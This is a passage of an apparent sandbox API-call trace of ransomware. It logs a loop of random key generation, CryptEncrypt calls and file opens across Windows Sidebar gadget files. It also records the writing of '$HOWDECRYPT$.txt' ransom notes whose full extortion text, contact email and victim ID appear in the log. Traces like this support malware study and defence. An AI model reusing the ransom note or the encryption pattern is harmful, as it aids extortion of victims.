pdwDataLen=0x270e8d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e8d8*=0x30) returned 1 [0161.271] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\daisies.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\daisies.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.274] GetProcessHeap () returned 0x2c0000 [0161.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.274] GetProcessHeap () returned 0x2c0000 [0161.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb06b8 | out: hHeap=0x2c0000) returned 1 [0161.274] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e8d8 | out: pbBuffer=0x270e8d8) returned 1 [0161.274] GetProcessHeap () returned 0x2c0000 [0161.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.274] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e8d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e8d0*=0x30) returned 1 [0161.274] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\7.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\7.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.279] GetProcessHeap () returned 0x2c0000 [0161.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.279] GetProcessHeap () returned 0x2c0000 [0161.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3b6d8 | out: hHeap=0x2c0000) returned 1 [0161.279] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e8d8 | out: pbBuffer=0x270e8d8) returned 1 [0161.279] GetProcessHeap () returned 0x2c0000 [0161.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.279] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e8d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e8d0*=0x30) returned 1 [0161.279] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\3.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\3.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.282] GetProcessHeap () returned 0x2c0000 [0161.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.283] GetProcessHeap () returned 0x2c0000 [0161.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3b2f8 | out: hHeap=0x2c0000) returned 1 [0161.283] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e8d0 | out: pbBuffer=0x270e8d0) returned 1 [0161.283] GetProcessHeap () returned 0x2c0000 [0161.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.283] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e8c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e8c8*=0x30) returned 1 [0161.283] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\1.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\1.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.283] GetProcessHeap () returned 0x2c0000 [0161.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.283] GetProcessHeap () returned 0x2c0000 [0161.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3af18 | out: hHeap=0x2c0000) returned 1 [0161.283] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e8d0 | out: pbBuffer=0x270e8d0) returned 1 [0161.283] GetProcessHeap () returned 0x2c0000 [0161.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.283] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e8c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e8c8*=0x30) returned 1 [0161.283] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\0.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\0.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.283] GetProcessHeap () returned 0x2c0000 [0161.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.284] GetProcessHeap () returned 0x2c0000 [0161.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3ae20 | out: hHeap=0x2c0000) returned 1 [0161.284] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e8c8 | out: pbBuffer=0x270e8c8) returned 1 [0161.284] GetProcessHeap () returned 0x2c0000 [0161.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.284] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e8c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e8c0*=0x30) returned 1 [0161.284] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\settings.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\settings.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.284] GetProcessHeap () returned 0x2c0000 [0161.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.284] GetProcessHeap () returned 0x2c0000 [0161.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb05b8 | out: hHeap=0x2c0000) returned 1 [0161.284] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e8c8 | out: pbBuffer=0x270e8c8) returned 1 [0161.284] GetProcessHeap () returned 0x2c0000 [0161.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.284] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e8c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e8c0*=0x30) returned 1 [0161.284] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\picturePuzzle.html" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\picturepuzzle.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.284] GetProcessHeap () returned 0x2c0000 [0161.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.285] GetProcessHeap () returned 0x2c0000 [0161.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb7940 | out: hHeap=0x2c0000) returned 1 [0161.285] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\js\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0161.286] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0161.286] WriteFile (in: hFile=0x178, lpBuffer=0x270e7f7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e920, lpOverlapped=0x0 | out: lpBuffer=0x270e7f7*, lpNumberOfBytesWritten=0x270e920*=0x127, lpOverlapped=0x0) returned 1 [0161.286] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0161.286] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e920, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e920*=0x2ac, lpOverlapped=0x0) returned 1 [0161.287] CloseHandle (hObject=0x178) returned 1 [0161.287] GetProcessHeap () returned 0x2c0000 [0161.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb7828 | out: hHeap=0x2c0000) returned 1 [0161.287] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e8c0 | out: pbBuffer=0x270e8c0) returned 1 [0161.287] GetProcessHeap () returned 0x2c0000 [0161.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.287] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e8b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e8b8*=0x30) returned 1 [0161.287] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\settings.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\js\\settings.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.287] GetProcessHeap () returned 0x2c0000 [0161.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.287] GetProcessHeap () returned 0x2c0000 [0161.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c89038 | out: hHeap=0x2c0000) returned 1 [0161.287] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e8b8 | out: pbBuffer=0x270e8b8) returned 1 [0161.287] GetProcessHeap () returned 0x2c0000 [0161.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.287] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e8b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e8b0*=0x30) returned 1 [0161.288] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\picturePuzzle.js" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\js\\picturepuzzle.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.288] GetProcessHeap () returned 0x2c0000 [0161.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.288] GetProcessHeap () returned 0x2c0000 [0161.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb7710 | out: hHeap=0x2c0000) returned 1 [0161.288] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e8b8 | out: pbBuffer=0x270e8b8) returned 1 [0161.288] GetProcessHeap () returned 0x2c0000 [0161.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.288] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e8b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e8b0*=0x30) returned 1 [0161.288] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\gadget.xml" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\gadget.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.288] GetProcessHeap () returned 0x2c0000 [0161.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.288] GetProcessHeap () returned 0x2c0000 [0161.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb04b8 | out: hHeap=0x2c0000) returned 1 [0161.288] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\css\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0161.289] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0161.289] WriteFile (in: hFile=0x178, lpBuffer=0x270e7e7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e910, lpOverlapped=0x0 | out: lpBuffer=0x270e7e7*, lpNumberOfBytesWritten=0x270e910*=0x127, lpOverlapped=0x0) returned 1 [0161.290] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0161.290] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e910, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e910*=0x2ac, lpOverlapped=0x0) returned 1 [0161.290] CloseHandle (hObject=0x178) returned 1 [0161.290] GetProcessHeap () returned 0x2c0000 [0161.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb75f8 | out: hHeap=0x2c0000) returned 1 [0161.290] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e8b0 | out: pbBuffer=0x270e8b0) returned 1 [0161.290] GetProcessHeap () returned 0x2c0000 [0161.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.291] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e8a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e8a8*=0x30) returned 1 [0161.291] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\settings.css" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\css\\settings.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.291] GetProcessHeap () returned 0x2c0000 [0161.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.291] GetProcessHeap () returned 0x2c0000 [0161.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c88f30 | out: hHeap=0x2c0000) returned 1 [0161.291] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e8a8 | out: pbBuffer=0x270e8a8) returned 1 [0161.291] GetProcessHeap () returned 0x2c0000 [0161.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.291] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e8a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e8a0*=0x30) returned 1 [0161.291] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\css\\picturePuzzle.css" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\css\\picturepuzzle.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.291] GetProcessHeap () returned 0x2c0000 [0161.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.291] GetProcessHeap () returned 0x2c0000 [0161.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb74e0 | out: hHeap=0x2c0000) returned 1 [0161.291] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e8a8 | out: pbBuffer=0x270e8a8) returned 1 [0161.292] GetProcessHeap () returned 0x2c0000 [0161.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.292] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e8a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e8a0*=0x30) returned 1 [0161.292] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\drag.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\drag.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.380] GetProcessHeap () returned 0x2c0000 [0161.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.380] GetProcessHeap () returned 0x2c0000 [0161.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8a768 | out: hHeap=0x2c0000) returned 1 [0161.380] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e8a0 | out: pbBuffer=0x270e8a0) returned 1 [0161.380] GetProcessHeap () returned 0x2c0000 [0161.380] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.380] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e898*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e898*=0x30) returned 1 [0161.381] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\triangle.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\triangle.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.394] GetProcessHeap () returned 0x2c0000 [0161.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.396] GetProcessHeap () returned 0x2c0000 [0161.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3ad28 | out: hHeap=0x2c0000) returned 1 [0161.397] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e8a0 | out: pbBuffer=0x270e8a0) returned 1 [0161.397] GetProcessHeap () returned 0x2c0000 [0161.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.398] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e898*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e898*=0x30) returned 1 [0161.398] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\graph_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\graph_down.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.398] GetProcessHeap () returned 0x2c0000 [0161.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.400] GetProcessHeap () returned 0x2c0000 [0161.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb01b8 | out: hHeap=0x2c0000) returned 1 [0161.400] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e898 | out: pbBuffer=0x270e898) returned 1 [0161.400] GetProcessHeap () returned 0x2c0000 [0161.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.400] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e890*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e890*=0x30) returned 1 [0161.400] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\combo-hover-right.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\combo-hover-right.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.406] GetProcessHeap () returned 0x2c0000 [0161.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.406] GetProcessHeap () returned 0x2c0000 [0161.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c88e28 | out: hHeap=0x2c0000) returned 1 [0161.406] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e898 | out: pbBuffer=0x270e898) returned 1 [0161.406] GetProcessHeap () returned 0x2c0000 [0161.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0161.406] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270e890*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270e890*=0x30) returned 1 [0161.406] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Currency.Gadget\\images\\base-undocked-3.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\currency.gadget\\images\\base-undocked-3.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.422] GetProcessHeap () returned 0x2c0000 [0161.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0161.422] GetProcessHeap () returned 0x2c0000 [0161.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c88b10 | out: hHeap=0x2c0000) returned 1 [0161.422] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e890 | out: pbBuffer=0x270e890) returned 1 [0161.422] GetProcessHeap () returned 0x2c0000 [0161.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, 